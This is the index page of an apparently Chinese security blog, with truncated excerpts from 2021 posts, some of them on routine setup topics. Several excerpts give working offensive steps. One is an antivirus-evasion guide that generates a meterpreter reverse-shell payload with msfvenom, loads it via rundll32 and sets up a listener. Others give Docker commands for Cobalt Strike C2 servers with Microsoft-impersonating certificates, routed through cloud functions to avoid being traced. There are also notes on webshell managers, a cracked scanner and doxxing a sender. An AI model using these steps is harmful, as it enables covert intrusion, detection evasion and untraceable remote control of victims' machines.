XR-SEC

发表于2021-06-20| 条评论

AWVS14 Update Note: if you think that there are some backdoors in this crack patch or those who reprint or delete the copyright, please do not use it!Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author of the article shall not bear any responsibility for this.Xrsec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you ...

Web RTC

发表于2021-06-11| 条评论

Web RTCRESUMEWebRTC，名称源自网页即时通信（英语：Web Real-Time Communication）的缩写，是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准。测试网站：https://ip.voidsec.com/ 插件：https://mybrowseraddon.com/webrtc-control.html 直连模式 Socks5代理模式 Burp-Suite 抓包模式 Burp-Suite 设置上级Socks代理 Burp-Suite建议添加上级代理

RancherOS 极简主义

发表于2021-06-08| 条评论

RancherOS 极简主义0x1 InI 如果你不希望为了使用Docker 而增加负担，不妨试试这个RancherOS NAME : RancherOS SITE : https://rancher.com/ RESUME: 一个极轻量且安全的Linux发行版。它由容器构建，将赋予您更好的容器运行体验。 0x2 INSTALL BY VMWAREBooting from ISO https://releases.rancher.com/os/latest/vmware/rancheros.isoFor docker-machine https://releases.rancher.com/os/latest/vmware/rancheros-autoformat.isoVMDK https://releases.rancher.com/os/latest/vmware/rancheros.vmdkInitrd https://releases.rancher.com/os/latest/vmware/initrd 0x21 Set Up VM 开机注意连接 ISO 0x22 P ...

大宝剑了解一下

发表于2021-06-07| 条评论

大宝剑了解一下About 大宝剑-信息收集和资产梳理工具（红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配）我个人认为这也是一款优秀的溯源工具，绝对是在能让你在客户现场加餐的优秀工具 Install 容器自动 pull 最新版，除非有大变更 docker run -it --name dbj -p 5000:5000 xrsec/dbj:latest InIadmin / adminhttp://localhost:5000/admin/https://github.com/wgpsec/DBJ 查看具体输出信息 docker logs dbj#watch docker logs dbj Debug 穷人家的孩子总喜欢瞎折腾贫穷限制了我的想象力，但是无法限制我的行动力 Dockerdbj.sh#!/bin/shclearecho "\n\033[1;34m __ __ ____ \033[0m"echo "\033[1;32m \ \/ ...

N1搞机之旅

发表于2021-06-06| 条评论

N1搞机之旅事情的起因：好师傅闲置了一台N1，刚好我准备入手一台，于是就20元白嫖了一台，某多多150到手哎，就是玩，正式介绍一下N1 最不正经的NAS—斐讯N1，其实我是盒子派来的卧底电视盒子 OPENWRT ******** 推荐使用因为师傅寄过来的时候已经成砖了，我那时候啥也不懂，于是乎就买了一根USB双公头线（其实两根手机充电线拼接一下也就🆗了）也不需要什么拆机短触，直接连接双公头线，打开刷机软件，提前选好并点击刷机按钮，然后开机，然后就滴。。。我这里有一份自己线刷用到的工具包你要不要。。。链接：https://pan.baidu.com/s/18doXN_DymKo7SaIyGvqT8A提取码：vd27 解压密码：pass 我是先刷的 N1_YYFROM夏杰语音实用版电视系统，然后再刷的Arch Linxu 接着转换 Centos ,听说Centos 得安装低版本，然后再升级终升级Centos 8 我放弃了，老老实实用吧，啥，你不会连 Arch 都不知道咋装吧，百度 N1 Arch 不行嘛？换源。默认情况下，没有默认情况 cp /etc ...

脚本小子免杀的一天

发表于2021-05-21| 条评论

脚本小子免杀的一天 charlotte 低调入过不点赞的都是龟孙预览 / Preview 生成payloadgit clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*cd charlottemsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.binpython charlotte.py # 最后一行有个命令 rundll32 xxxxxxxxrundll32 charlotte.dll, UehQD3rwWxT 运行payloadC:\Windows\System32\rundll32.exe C:\Users\xr\Desktop\charlotte.dll UehQD3rwWxT 监听payloaduse exploit/multi/handlerset payload windows/x64/mete ...

AWVS with Xray By Docker

发表于2021-05-20| 条评论

AWVS with Xray By Docker预览 / Preview 安装 / Install# 初始化 # 注意修改文件路劲docker run -it -d \--name awvs \-p 3443:3443 \-v /opt/xrsec/docker/test/xray:/awvs/xray \xrsec/awvs:v14 进阶升级 / Advanced upgradesudo docker exec -it awvs bash # 换源echo -e "deb http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse \\ndeb-src http://mirrors.aliyun.com/ubuntu/ bionic main restricted universe multiverse \\ndeb http://mirrors.aliyun.com/ubuntu/ bionic-security main restricted universe multi ...

渗透学习的一天

发表于2021-05-10| 条评论

渗透学习的一天0x01昨天用单位的网测试了一下自己服务器的SQL注入，站起来都日不进去 0x02今天下班，收到一封邮件，打开一看，我这是要抱上大腿做老板吗？ 0x03我是这种人吗？开始正题🌹inside 首先邮箱给了一个用户名，从 gg上看一下能不能得到有用的信息，记得名字换一下位置其次他给了一个发件人，我们再一次gg 通过不懈努力，我找到以下信息 🥰微步域名反查，你值得拥有查到qq调用接口得到手机号，tg 试试看对不对的上，再看看支付宝钉钉微信百度 💻对比whois 📮邮箱继续查日服务器😂日服务器是不可能的，我这么菜，怎么可能日的下来最后

CobaltStrike4.3 特别供应版

发表于2021-05-09| 条评论

CobaltStrike4.3 特别供应版安装说明docker run -it \ --name cs \ -e "passwd=你的密码" \ -e "server_ip=你的服务器IP地址，可以是内网地址，比如10.0.4.6" \ -e "server_port=cs指定登陆端口" \ -e "aliasname=Bing Wallpaper" \ -e "dname=CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \ -p cs指定登陆端口:cs指定登陆端口 \ -p 云函数专用，可以是任意端口，后面443不可改变:443 \ -p 随意端口号:随意端口号 \ -p cs指定登陆端口:cs指定登陆端口/udp \ -p 云函数专用，可以是任意端口，后面443不可改变: ...

Windows Remote Desktop High DPI

发表于2021-04-29| 条评论

Windows Remote Desktop High DPI.md0X01 计算机配置\策略\管理模板\ Windows组件\远程桌面服务\远程桌面会话主机\远程会话环境\限制最大显示分辨率 0X02 screen mode id:i:2desktopwidth:i:1920desktopheight:i:1200 0X03mRemoteNG Github Microsoft Remote Desktop 0X04https://4sysops.com/archives/display-rdp-sessions-on-hidpi-monitors/ If the name of the copy is mstsc2.exe, the following .reg file will set the necessary key: 如果拷贝的名称是mstsc2.exe，下面的.reg文件将设置必要的密钥:更好的解决方案：远程桌面客户端的两个副本。一个启用缩放功能，另一个不启用缩放功能。让我们创建一个mstsc.exe副本（称为mstsc2.exe），并使用AppCompatFla ...

Docker V2raya ipsec-vpn-server

发表于2021-04-23| 条评论

Docker V2raya Ipsec-vpn-serverOpen The Ports Install Dockercurl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repoyum makecache && yum update -y && yum upgrade -y# https://docs.docker.com/engine/install/centos/yum remove docker \ docker-client \ docker-client-latest \ docker-common \ docker-latest \ docker-latest-logrotate \ docker-logrotate \ ...

CobaltStrike4.3 Docker with Mac

发表于2021-04-23| 条评论

CobaltStrike4.3 Docker with Mac MakeAmd64docker run -it \ --name cs \ -e passwd="e9PrFYtrPFD2U" \ -e server_ip="192.168.1.88" \ -e server_port=33002 \ -e aliasname="Bing Wallpaper" \ -e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \ -p 33002:33002 \ -p 443:443 \ -p 80:80 \ -p 33002:33002/udp \ -p 443:443/udp \ -p 80:80/udp \ registry.cn-hangzhou.aliyuncs.com/xrsec/cobaltstrike:4.3 Armdocker run - ...

Mac M1 用户也能用上 Godzilla Behinder

发表于2021-04-19| 条评论

Mac M1 用户也能用上 Godzilla BehinderBehindercd /Applications/Godzilla.app/Contents/app//Library/Java/JavaVirtualMachines/jdk15/Contents/Home/bin/java --module-path "/Applications/Behinder.app/Contents/app/lib" --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.base --add-modules=javafx.graphics --add-modules=javafx.web -Xdock:icon=/Applications/Behinder.app/Contents/app/app.icns -jar /Applications/Behinder.app/Contents/app/Behinder.jar /Applications/Behinder.app ...

cobaltstrike docker

发表于2021-04-18|docker•安全| 条评论

cobaltstrike docker截图那啥我建议你们改改这些dname=”CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US”还是那句话后门自测拉取镜像Mac M1docker run -it \ --name cs \ -e passwd="e9PrFYtrPFD2U" \ -e server_ip="192.168.1.1" \ -e server_port=33002 \ -e aliasname="Bing Wallpaper" \ -e dname="CN=www.microsoft.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=WA, C=US" \ -p 33002:33002 \ -p 443:443 \ -p 80:80 \ -p ...

CobaltStrike 4.2 Cloud function and Docker

发表于2021-04-18| 条评论

CobaltStrike 4.2 Cloud function and DockerIntroduceThanks CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。使用云函数，避免被溯源使用docker 容器，快速方便使用我写的python脚本，避免意外泄漏 Cobattstrike is a platform wide multi-party collaborative post penetration attack framework based on Java. Cobaltstrike integrates port forwarding, port scanning, socket proxy, privilege raising, phishing, remote control Trojan horse and other functions. The tool almost covers ...